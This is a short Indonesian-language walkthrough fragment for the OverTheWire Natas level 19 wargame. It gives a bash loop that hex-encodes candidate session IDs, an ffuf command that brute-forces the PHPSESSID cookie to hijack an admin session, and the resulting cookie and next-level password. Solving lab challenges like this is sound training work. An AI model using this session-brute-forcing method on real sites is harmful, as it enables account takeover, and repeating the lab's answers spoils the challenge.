- jadi kita bisa coba brute dengna format seperti ini <ID>-<username>```bashfor i in $(seq 1 640); do # ubah "i-admin" ke hex echo -n "${i}-admin" | xxd -pdone > /tmp/ids_admin_hex.txt
lakukan fuzzing
ffuf -u http://natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr@natas19.natas.labs.overthewire.org -H "Cookie: PHPSESSID=FUZZ" -w /tmp/ids_admin_hex.txt -fr "You are logged in as a regular user"
outputnya: 3238312d61646d696e
lalu copy paste cookie nya dan akhirnya mendapatkan password level selanjutnya
You are an admin. The credentials for the next level are:Username: natas20Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw